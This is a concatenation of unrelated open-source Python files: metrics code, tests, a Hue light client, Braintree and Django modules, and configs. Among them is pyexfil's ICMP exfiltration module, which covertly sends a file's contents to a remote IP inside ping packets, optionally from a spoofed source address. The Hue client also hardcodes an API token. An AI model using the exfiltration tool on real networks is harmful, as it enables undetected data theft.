precision = tps.astype('float32') / (tps + fps)
if y_true.ndim == 1:
recall = tps.astype('float32') / tps[-1]
else:
recall = tps.astype('float32') / tps[last_col]
reverse = _reverse_idx(fps.ndim)
precision = precision[reverse]
recall = recall[reverse]
thresholds = thresholds[reverse]
if y_true.ndim == 1:
ones, zeros = np.asarray([1], dtype='float32'), np.asarray([0], dtype='float32')
else:
ones = T.ones_like(precision)[last_col]
zeros = T.zeros_like(recall)[last_col]
precision = T.concatenate([precision, ones], axis=-1)
recall = T.concatenate([recall, zeros], axis=-1)
return precision, recall, thresholds
def average_precision_scores(y_true, y_predicted):
precision, recall, _ = precision_recall_curves(y_true, y_predicted)
return auc(recall, precision)
def precision_recall_loss(y_true, y_predicted):
"convenience function to minimize for"
return 1-average_precision_scores(y_true, y_predicted)
def last_axis_precision_recall_curve(y_true, y_predicted):
fps, tps, thresholds = _last_axis_binary_clf_curve(y_true, y_predicted)
i = [slice(None)] * fps.ndim
i[-1] = [-1]
precision = tps.astype('float32') / (tps + fps)
recall = tps.astype('float32') / tps[i]
i[-1] = slice(None, None, -1)
precision = precision[i]
recall = recall[i]
thresholds = thresholds[i]
i[-1] = [-1]
precision = np.concatenate([precision, np.ones(precision.shape)[i]], axis=-1)
recall = np.concatenate([recall, np.zeros(recall.shape)[i]], axis=-1)
return precision, recall, thresholds
#aliases
roc_curve = roc_curves
roc_auc_score = roc_auc_scores
precision_recall_curve = precision_recall_curves
average_precision_score = average_precision_scores
_binary_clf_curve = _binary_clf_curves
|
jonathanstrong/tmetrics
|
tmetrics/classification.py
|
Python
|
mit
| 14,853
|
import os
import unittest
import numpy as np
from tfsnippet.examples.utils import MLResults
from tfsnippet.utils import TemporaryDirectory
def head_of_file(path, n):
with open(path, 'rb') as f:
return f.read(n)
class MLResultTestCase(unittest.TestCase):
def test_imwrite(self):
with TemporaryDirectory() as tmpdir:
results = MLResults(tmpdir)
im = np.zeros([32, 32], dtype=np.uint8)
im[16:, ...] = 255
results.save_image('test.bmp', im)
file_path = os.path.join(tmpdir, 'test.bmp')
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(head_of_file(file_path, 2), b'\x42\x4d')
results.save_image('test.png', im)
file_path = os.path.join(tmpdir, 'test.png')
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(head_of_file(file_path, 8),
b'\x89\x50\x4e\x47\x0d\x0a\x1a\x0a')
results.save_image('test.jpg', im)
file_path = os.path.join(tmpdir, 'test.jpg')
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(head_of_file(file_path, 3), b'\xff\xd8\xff')
|
korepwx/tfsnippet
|
tests/examples/utils/test_mlresult.py
|
Python
|
mit
| 1,216
|
import logging
import requests
HUE_IP = '192.168.86.32'
HUE_USERNAME = '7KcxItfntdF0DuWV9t0GPMeToEBlvHTgqWNZqxu6'
logger = logging.getLogger('hue')
def getLights():
url = 'http://{0}/api/{1}/lights'.format(HUE_IP, HUE_USERNAME)
try:
r = requests.get(url)
except:
logger.error('Failed getting status for all lights')
return
if r.status_code == 200:
data = r.json()
return data
def getStatus(id):
url = 'http://{0}/api/{1}/lights/{2}'.format(HUE_IP, HUE_USERNAME, id)
try:
r = requests.get(url)
except:
logger.error('Failed getting status for light {0}'.format (id))
return
if r.status_code == 200:
data = r.json()
return data
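def setState(id, on):
    # Hedged sketch, not part of the original module: toggle a light through
    # the Hue REST API state endpoint (PUT /api/<username>/lights/<id>/state).
    url = 'http://{0}/api/{1}/lights/{2}/state'.format(HUE_IP, HUE_USERNAME, id)
    try:
        r = requests.put(url, json={'on': on})
    except:
        logger.error('Failed setting state for light {0}'.format(id))
        return
    if r.status_code == 200:
        return r.json()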
|
twotymz/lucy
|
hue/lights.py
|
Python
|
mit
| 705
|
import re
import braintree
from braintree.address import Address
from braintree.error_result import ErrorResult
from braintree.exceptions.not_found_error import NotFoundError
from braintree.resource import Resource
from braintree.successful_result import SuccessfulResult
class AddressGateway(object):
def __init__(self, gateway):
self.gateway = gateway
self.config = gateway.config
def create(self, params={}):
Resource.verify_keys(params, Address.create_signature())
if not "customer_id" in params:
raise KeyError("customer_id must be provided")
        if not re.search(r"\A[0-9A-Za-z_-]+\Z", params["customer_id"]):
raise KeyError("customer_id contains invalid characters")
response = self.config.http().post("/customers/" + params.pop("customer_id") + "/addresses", {"address": params})
if "address" in response:
return SuccessfulResult({"address": Address(self.gateway, response["address"])})
elif "api_error_response" in response:
return ErrorResult(self.gateway, response["api_error_response"])
def delete(self, customer_id, address_id):
self.config.http().delete("/customers/" + customer_id + "/addresses/" + address_id)
return SuccessfulResult()
def find(self, customer_id, address_id):
try:
response = self.config.http().get("/customers/" + customer_id + "/addresses/" + address_id)
return Address(self.gateway, response["address"])
except NotFoundError:
raise NotFoundError("address for customer " + customer_id + " with id " + address_id + " not found")
def update(self, customer_id, address_id, params={}):
Resource.verify_keys(params, Address.update_signature())
response = self.config.http().put(
"/customers/" + customer_id + "/addresses/" + address_id,
{"address": params}
)
if "address" in response:
return SuccessfulResult({"address": Address(self.gateway, response["address"])})
elif "api_error_response" in response:
return ErrorResult(self.gateway, response["api_error_response"])
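# Hedged usage sketch (gateway construction elided; field values are
# illustrative):
#   result = gateway.address.create({
#       "customer_id": "a_customer_id",
#       "street_address": "1 E Main St",
#   })
#   if result.is_success:
#       print(result.address.id)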
|
eldarion/braintree_python
|
braintree/address_gateway.py
|
Python
|
mit
| 2,190
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'msgiver'
copyright = '2018, Tatsunori Nishikori'
author = 'Tatsunori Nishikori'
# The short X.Y version
version = '0.1'
# The full version, including alpha/beta/rc tags
release = '0.1.7.1'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'msgiverdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'msgiver.tex', 'msgiver Documentation',
'Tatsunori Nishikori', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'msgiver', 'msgiver Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'msgiver', 'msgiver Documentation',
author, 'msgiver', 'One line description of project.',
'Miscellaneous'),
]
|
kitaro-tn/msgiver
|
_docs/conf.py
|
Python
|
mit
| 4,844
|
# -*- coding: utf-8 -*-
from anima.render.arnold import base85
import unittest
import struct
class Base85TestCase(unittest.TestCase):
"""tests the base85 module
"""
    def setUp(self):
"""setup the test
"""
pass
def test_arnold_b85_encode_is_working_properly(self):
"""testing if arnold_b85_encode is working properly
"""
raw_data = [
struct.pack('f', 2),
struct.pack('f', 3.484236717224121),
]
encoded_data = [
'8TFfd',
'8^RH(',
]
for i in range(len(raw_data)):
self.assertEqual(
encoded_data[i],
base85.arnold_b85_encode(raw_data[i])
)
def test_arnold_b85_encode_packs_zeros_properly(self):
"""testing if arnold_b85_encode is packing zeros properly
"""
raw_data = [
struct.pack('f', 0.0),
struct.pack('ffff', 0.0, 0.0, 3.484236717224121, 0.0)
]
encoded_data = [
'z',
'zz8^RH(z'
]
for i in range(len(raw_data)):
self.assertEqual(
encoded_data[i],
base85.arnold_b85_encode(raw_data[i])
)
def test_arnold_b85_encode_packs_ones_properly(self):
"""testing if arnold_b85_encode is packing ones properly
"""
raw_data = [
struct.pack('f', 1.0),
struct.pack('ffff', 1.0, 1.0, 3.484236717224121, 1.0)
]
encoded_data = [
'y',
'yy8^RH(y'
]
for i in range(len(raw_data)):
self.assertEqual(
encoded_data[i],
base85.arnold_b85_encode(raw_data[i])
)
def test_arnold_b85_decode_is_working_properly(self):
"""testing if arnold_b85_decode is working properly
"""
raw_data = [
struct.pack('f', 2),
struct.pack('f', 3.484236717224121),
]
encoded_data = [
'8TFfd',
'8^RH(',
]
for i in range(len(raw_data)):
self.assertEqual(
raw_data[i],
base85.arnold_b85_decode(encoded_data[i])
)
def test_arnold_b85_decode_unpacks_zeros_properly(self):
"""testing if arnold_b85_decode is unpacking zeros properly
"""
raw_data = [
struct.pack('f', 0.0),
struct.pack('ffff', 0.0, 0.0, 3.484236717224121, 0.0)
]
encoded_data = [
'z',
'zz8^RH(z'
]
for i in range(len(raw_data)):
self.assertEqual(
raw_data[i],
base85.arnold_b85_decode(encoded_data[i])
)
def test_arnold_b85_decode_unpacks_ones_properly(self):
"""testing if arnold_b85_decode is unpacking zeros properly
"""
raw_data = [
struct.pack('f', 1.0),
struct.pack('ffff', 1.0, 1.0, 3.484236717224121, 1.0)
]
encoded_data = [
'y',
'yy8^RH(y'
]
for i in range(len(raw_data)):
self.assertEqual(
raw_data[i],
base85.arnold_b85_decode(encoded_data[i])
)
def test_arnold_b85_encoding_real_world_data(self):
"""testing encoding with some real world data
"""
# b85UINT
raw_data = [0, 1, 9, 8, 1, 2, 10, 9, 2, 3, 11, 10, 3, 4, 12, 11, 4, 5,
13, 12, 5, 6, 14, 13, 6, 7, 15, 14]
encoded_data = "&UOP6&psb:'7Bt>'Rg1B'n6CF(4ZUJ(P)gN"
data_format = '%sB' % len(raw_data)
self.assertEqual(
encoded_data,
base85.arnold_b85_encode(struct.pack(data_format, *raw_data))
)
self.assertEqual(
raw_data,
list(struct.unpack('%sB' % len(raw_data),
base85.arnold_b85_decode(encoded_data)))
)
# b85POINT2
raw_data = [0, 0.75, 0.0625, 0.75, 0.125, 0.75, 0.1875, 0.75, 0.25,
0.75, 0.3125, 0.75, 0.375, 0.75, 0.4375, 0.75, 0, 1,
0.0625, 1, 0.125, 1, 0.1875, 1, 0.25, 1, 0.3125, 1, 0.375,
1, 0.4375, 1]
encoded_data = "z8?r5N7e-P78?r5N7reTb8?r5N8$W,M8?r5N8+HY88?r5N8.koX8" \
"?r5N82:0x8?r5N85]GC8?r5Nzy7e-P7y7reTby8$W,My8+HY8y8." \
"koXy82:0xy85]GCy"
data_format = '%sf' % len(raw_data)
self.assertEqual(
encoded_data,
base85.arnold_b85_encode(struct.pack(data_format, *raw_data))
)
self.assertEqual(
raw_data,
list(struct.unpack('%sf' % len(raw_data),
base85.arnold_b85_decode(encoded_data)))
)
# b85POINT
raw_data = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46,
47]
encoded_data = "zy8TFfd8[8>O8b)k:8eM,Z8hpC%8l>YE8oaoe8qI%u8s0108tl<@" \
"8vSGP8x:R`9$v]p9&]i+9(Dt;9)8OC9*,*K9*tZS9+h5[9,[ec9-" \
"O@k9.Bps9/6L&90*'.90rW691f2>92YbF93M=N94@mV954H^96'x" \
"f96L;j96pSn97?kr97d.v983G%98W_)99&w-99K:199oR59:>j99" \
":c-=9;2EA9;V]E9<%uI9<J8M"
data_format = '%sf' % len(raw_data)
self.assertEqual(
encoded_data,
base85.arnold_b85_encode(struct.pack(data_format, *raw_data))
)
self.assertEqual(
raw_data,
list(struct.unpack('%sf' % len(raw_data),
base85.arnold_b85_decode(encoded_data)))
)
|
eoyilmaz/anima
|
tests/arnold/test_base85.py
|
Python
|
mit
| 5,868
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-04-15 18:42
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Attempt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('attempt_notes', models.TextField(default='')),
],
),
migrations.CreateModel(
name='Climb',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('image', models.ImageField(blank=True, null=True, upload_to='static/img')),
('difficulty', models.IntegerField(choices=[(5, '5'), (6, '6'), (7, '7'), (8, '8'), (9, '9'), (10, '10'), (11, '11'), (12, '12'), (13, '13'), (14, '14')], default=5)),
('grade', models.CharField(choices=[('a', 'a'), ('b', 'b'), ('c', 'c'), ('d', 'd')], default='a', max_length=1)),
('notes', models.TextField(default='')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='attempt',
name='climb',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='rockclimb.Climb'),
),
]
|
djstein/hci_final
|
hci/rockclimb/migrations/0001_initial.py
|
Python
|
mit
| 1,801
|
#!/usr/bin/python
import os
import sys
import zlib
import time
import datetime
import base64
from socket import *
from impacket import ImpactPacket
""" Constants """
READ_BINARY = "rb"
WRITE_BINARY = "wb"
READ_FROM_SOCK = 7000
ICMP_HEADER_SIZE = 27
DATA_SEPARATOR = "::"
DATA_TERMINATOR = "\x12\x13\x14\x15"
INIT_PACKET = "\x12\x11\x13\x12\x12\x12"
END_PACKET = "\x15\x14\x13\x12"
LOGFILE_BASENAME = "icmp_log"
LOGFILE_EXT = ".txt"
def send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1):
"""
send_file will send a file to the ip_addr given.
A file path is required to send the file.
Max packet size can be determined automatically.
:param ip_addr: IP Address to send the file to.
:param src_ip_addr: IP Address to spoof from. Default it 127.0.0.1.
:param file_path: Path of the file to send.
:param max_packetsize: Max packet size. Default is 512.
:return:
"""
if file_path == "":
sys.stderr.write("No file path given.\n")
return -1
# Load file
fh = open(file_path, READ_BINARY)
iAmFile = fh.read()
fh.close()
# Create Raw Socket
s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
# Create IP Packet
ip = ImpactPacket.IP()
ip.set_ip_src(src_ip_addr)
ip.set_ip_dst(ip_addr)
# ICMP on top of IP
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
seq_id = 0
# Calculate File:
IamDone = base64.b64encode(iAmFile) # Base64 Encode for ASCII
checksum = zlib.crc32(IamDone) # Build CRC for the file
# Fragmentation of DATA
x = len(IamDone) / max_packetsize
y = len(IamDone) % max_packetsize
# Get file name from file path:
head, tail = os.path.split(file_path)
# Build stream initiation packet
current_packet = ""
current_packet += tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(x + 2) + DATA_TERMINATOR + INIT_PACKET
icmp.contains(ImpactPacket.Data(current_packet))
ip.contains(icmp)
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
time.sleep(SLEEP)
seq_id += 1
# Iterate over the file
for i in range(1, x + 2):
str_send = IamDone[max_packetsize * (i - 1): max_packetsize * i] + DATA_TERMINATOR
icmp.contains(ImpactPacket.Data(str_send))
ip.contains(icmp)
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
time.sleep(SLEEP)
seq_id += 1
# Add last section
str_send = IamDone[max_packetsize * i:max_packetsize * i + y] + DATA_TERMINATOR
icmp.contains(ImpactPacket.Data(str_send))
ip.contains(icmp)
seq_id += 1
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
time.sleep(SLEEP)
# Send termination package
str_send = (tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(seq_id) + DATA_TERMINATOR + END_PACKET)
icmp.contains(ImpactPacket.Data(str_send))
ip.contains(icmp)
seq_id += 1
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (ip_addr, 0))
return 0
def init_listener(ip_addr, saving_location="."):
"""
init_listener will start a listener for incoming ICMP packets
on a specified ip_addr to receive the packets. It will then
save a log file and the incoming information to the given path.
If none given it will generate one itself.
:param ip_addr: The local IP address to bind the listener to.
:return: Nothing.
"""
# Trying to open raw ICMP socket.
# If fails, you're probably just not root
try:
sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
sock.bind(('', 1))
sys.stdout.write("Now listening...\n")
except:
sys.stderr.write("Could not start listening.\nProbably not root.\n")
raise
# Resetting counters
files_received = 0
i = 0
current_file = ""
# init log file:
current_time_as_string = str(datetime.datetime.now()).replace(":",".").replace(" ", "-")[:-7]
log_fh = open(LOGFILE_BASENAME + current_time_as_string + LOGFILE_EXT, WRITE_BINARY)
log_fh.write("Started logging at %s\n\n" % current_time_as_string)
while True:
# Extract data from IP header
data = sock.recv(READ_FROM_SOCK) # Get data
ip_header = data[:20] # Extract IP Header
# Get IP
ips = ip_header[-8:-4]
source = "%i.%i.%i.%i" % (ord(ips[0]), ord(ips[1]), ord(ips[2]), ord(ips[3]))
# Ignore everything but ECHO requests
if data[20] != "\x08":
pass
elif data[28:].find(INIT_PACKET) != -1:
# Extract data from Initiation packet:
man_string = data[28:] # String to manipulate
            man_array = man_string.split(DATA_SEPARATOR) # Split data into array
filename = man_array[0]
checksum = man_array[1]
amount_of_packets = man_array[2]
# Document to log file
log_fh.write("Received file:\n")
log_fh.write("\tFile name:\t%s\n" % filename)
log_fh.write("\tIncoming from:\t%s\n" % source)
log_fh.write("\tFile checksum:\t%s\n" % checksum)
log_fh.write("\tIn Packets:\t%s\n" % amount_of_packets)
log_fh.write("\tIncoming at:\t%s\n" % str(datetime.datetime.now()).replace(":", ".").replace(" ", "-")[:-7])
elif data[28:].find(END_PACKET) != -1:
# Extract data from Initiation packet:
man_string = data[28:] # String to manipulate
            man_array = man_string.split(DATA_SEPARATOR) # Split data into array
if filename != man_array[0]:
sys.stderr.write("You tried transferring 2 files simultaneous. Killing my self now!\n")
log_fh.write("Detected 2 file simultaneous. Killing my self.\n")
return -1
else:
log_fh.write("Got termination packet for %s\n" % man_array[0])
comp_crc = zlib.crc32(current_file)
if str(comp_crc) == checksum:
# CRC validated
log_fh.write("CRC validation is green for " + str(comp_crc) + " with file name: " + filename + "\n")
current_file = base64.b64decode(current_file)
# Write to file
fh = open(filename + "_" + checksum, WRITE_BINARY)
fh.write(current_file)
fh.close()
files_received += 1
else:
# CRC failed
log_fh.write("CRC validation FAILED for '" + str(comp_crc) + "' with : " + checksum + "\n")
# Resetting counters:
i = 0
filename = ""
data = ""
man_string = ""
man_array = []
elif data[28:].find(DATA_TERMINATOR) != -1:
# Found a regular packet
current_file += data[28:data.find(DATA_TERMINATOR)]
log_fh.write("Received packet %s" % i + "\n")
i += 1
if __name__ == "__main__":
sys.stdout.write("This is meant to be a module for python and not a stand alone executable\n")
|
ytisf/PyExfil
|
pyexfil/network/ICMP/icmp_exfiltration.py
|
Python
|
mit
| 6,676
|
from django.http import StreamingHttpResponse, HttpResponseServerError
from download_service.zipbuilder import DDSZipBuilder, NotFoundException, NotSupportedException
from django.contrib.auth.decorators import login_required
from download_service.utils import make_client
from django.http import Http404
@login_required
def dds_project_zip(request, project_id, filename):
client = make_client(request.user)
builder = DDSZipBuilder(project_id, client)
try:
builder.raise_on_filename_mismatch(filename)
response = StreamingHttpResponse(builder.build_streaming_zipfile(), content_type='application/zip')
response['Content-Disposition'] = 'attachment; filename={}'.format(filename)
return response
except NotFoundException as e:
raise Http404(str(e))
except NotSupportedException as e:
return HttpResponseServerError(content=str(e))
|
Duke-GCB/DukeDSHandoverService
|
download_service/views.py
|
Python
|
mit
| 899
|
from celery.schedules import crontab
import djcelery
from django.conf.global_settings import EMAIL_BACKEND
import os, sys, logging
import subprocess
###############################
# MISC #
##############################
ROOT_PATH = os.path.dirname(__file__)
def to_absolute_path(path):
return os.path.realpath(os.path.join(ROOT_PATH, path))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DONATION_DEBUG = True #So we don't have to rely on django's debug.
BLOCK_FB_POSTS = True
#ROOT_PATH = os.path.dirname(__file__)
EXTRA_PATHS = [
'lib',
]
for path in EXTRA_PATHS:
path = to_absolute_path(path)
if path not in sys.path:
sys.path.append(path)
PROXY_SERVER = "PROXY_SERVER"
IGNORE_HTTPS = False
###############################
# CAMPAIGN SETTINGS #
##############################
MAX_PAYMENT_RETRIES = 1
PAYMENT_RETRY_SCHEDULE = [1, 3, 7]
JUMOEIN = ""
###############################
# ADMIN SETTINGS #
##############################
ADMINS = (
('Jumo Site Error', 'EMAIL@HERE'),
)
MANAGERS = ADMINS
###############################
# STATIC SETTINGS #
##############################
SERVE_STATIC_FILES = False
STATIC_URL = ''
NO_STATIC_HASH = False
###############################
# DB SETTINGS #
##############################
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'jumodjango',
'USER': 'jumo',
'PASSWORD': 'DB_PASSWORD',
'HOST': '',
'PORT': '',
},
}
#Map the db name to path of matching schema file.
DATABASE_CREATE_SCHEMAS = {
'default':to_absolute_path('data/schema/jumodjango.schema'),
}
###############################
# SOLR SETTINGS #
##############################
SOLR_CONN = 'http://SOLRSERVER:8983/solr'
###############################
# DISQUS SETTINGS #
##############################
DISQUS_API_VERSION = '3.0'
DISQUS_FORUM_NAME = 'jumoprod'
DISQUS_SECRET_KEY = 'SOME_DISQUS_SECRET_KEY' #jumo_prod_app
DISQUS_PUBLIC_KEY = 'SOME_DISQUS_PUBLIC_KEY' #jumo_prod_app
DISQUS_DEV_MODE = 0 # 1 for dev, 0 for prod and stage
###############################
# EMAIL SETTINGS #
##############################
DEFAULT_FROM_EMAIL = 'FROM@USER'
EMAIL_HOST = ''
EMAIL_PORT = 25
EMAIL_HOST_USER = 'EMAIL@HOSTUSER'
EMAIL_HOST_PASSWORD = 'SOME_EMAIL_HOST_PASSWORD'
EMAIL_USER_TLS = False
CELERY_EMAIL_BACKEND = EMAIL_BACKEND
EMAIL_REAL_PEOPLE = False
CRYPTO_SECRET = r'CRYPTO_SECRET_HERE'
###############################
# CELERY SETTINGS #
##############################
# AMQP setup for Celery
BROKER_HOST = ""
BROKER_PORT = 5672
BROKER_USER = "jumo"
BROKER_PASSWORD = "SOME_BROKER_PASSWORD"
BROKER_VHOST = "/"
CELERY_DEFAULT_QUEUE = "now"
CELERY_QUEUES = {
"now": {
"binding_key": "task.#",
},
"deferred": {
"binding_key": "deferred.#",
},
"billing": {
"binding_key": "billing.#",
},
}
CELERY_DEFAULT_EXCHANGE = "tasks"
CELERY_DEFAULT_EXCHANGE_TYPE = "topic"
CELERY_DEFAULT_ROUTING_KEY = "task.default"
CELERY_ROUTES = {"mailer.reader_tasks.send_jumo_reader_email":
{"queue": "deferred",
"routing_key": "deferred.reader"
},
"donation.tasks.process_donation":
{"queue": "billing",
"routing_key": "billing.process_donation"}
}
CELERY_IMPORTS = ('mailer.notification_tasks',
'mailer.reader_tasks',
'donation.tasks',
'mailer.messager_tasks',)
###############################
# DJANGO SETTINGS #
##############################
CONSOLE_MIDDLEWARE_DEBUGGER = True
APPEND_SLASH = False
#SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'
CACHE_BACKEND = 'memcached://127.0.0.1:11211?timeout=86400'
AUTHENTICATION_BACKENDS = (
'etc.backend.JumoBackend',
)
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1337
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = to_absolute_path('static')
MEDIA_URL = '/static/'
ADMIN_MEDIA_PREFIX = '/static/media/admin/'
HTTP_HOST = 'www.ogbon.com'
SECRET_KEY = 'SOME_SECRET_KEY_HERE'
MIDDLEWARE_CLASSES = (
'etc.middleware.SSLMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
#'django.contrib.auth.middleware.AuthenticationMiddleware',
#'django.contrib.messages.middleware.MessageMiddleware',
'etc.middleware.DetectUserMiddleware',
'etc.middleware.SourceTagCollectionMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'etc.middleware.AddExceptionMessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
to_absolute_path('templates'),
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.debug',
'django.core.context_processors.auth',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.request',
'etc.context_processors.general',
)
INSTALLED_APPS = (
'grappelli',
'djcelery',
'django.contrib.auth',
'django.contrib.contenttypes',
#'django.contrib.sessions',
'django.contrib.sites',
#'django.contrib.messages',
'django.contrib.admin',
'django.contrib.humanize',
'cust_admin',
'users',
'issue',
'org',
'data',
'cust_admin',
'etc',
'api',
'lib',
'search',
'utils',
'mailer',
'donation',
'message',
'sourcing',
'popularity',
'django_jenkins',
'tastypie',
'action',
'entity_items',
'commitment',
'debug_toolbar',
'discovery',
)
###############################
# API SETTINGS #
##############################
API_VERSION = 'v1'
###############################
# TESTING SETTINGS #
##############################
FIXTURE_DIRS = ("data/fixtures/",)
TEST_RUNNER = 'jumodjango.test.test_runner.JumoTestSuiteRunner'
JENKINS_TEST_RUNNER = 'jumodjango.test.test_runner.JumoTestSuiteRunner'
EXCLUDED_TEST_PACKAGES = ['django',]
PROJECT_APPS = (
'users',
'issue',
'org',
'mailer',
'donation',
'message',
'sourcing',
'popularity',
)
###############################
# API KEY SETTINGS #
##############################
MIXPANEL_TOKEN = 'SOME_MIXPANEL_TOKEN'
FACEBOOK_APP_ID = 'SOME_FACEBOOK_APP_ID'
FACEBOOK_API_KEY = 'SOME_FACEBOOK_API_KEY'
FACEBOOK_SECRET = 'SOME_FACEBOOK_SECRET'
FACEBOOK_ACCESS_TOKEN = 'SOME_FACEBOOK_ACCESS_TOKEN'
AWS_ACCESS_KEY = 'SOME_AWS_ACCESS_KEY'
AWS_SECRET_KEY = 'SOME_AWS_SECRET'
AWS_PHOTO_UPLOAD_BUCKET = "jumoimgs"
###############################################################
# DATAMINE SETTINGS - serve miner.views if IS_DATAMINE is True
###############################################################
IS_DATAMINE = False
###############################
# DATA SCIENCE TOOLKIT SETTINGS
###############################
# Use their AMI in production,
DSTK_API_BASE = "http://DSTK_HOST"
##############################
# DATAMINE SERVER
##############################
DATAMINE_BASE = "http://DATAMINE_HOST"
##############################
# LOGGER SETTINGS
##############################
LOG_DIR = '/cloud/logs/'
###############################
# DEBUG TOOLBAR SETTINGS
###############################
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TOOLBAR_CALLBACK': lambda x: False
}
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar.panels.version.VersionDebugPanel',
'debug_toolbar.panels.timer.TimerDebugPanel',
'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
'debug_toolbar.panels.headers.HeaderDebugPanel',
'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
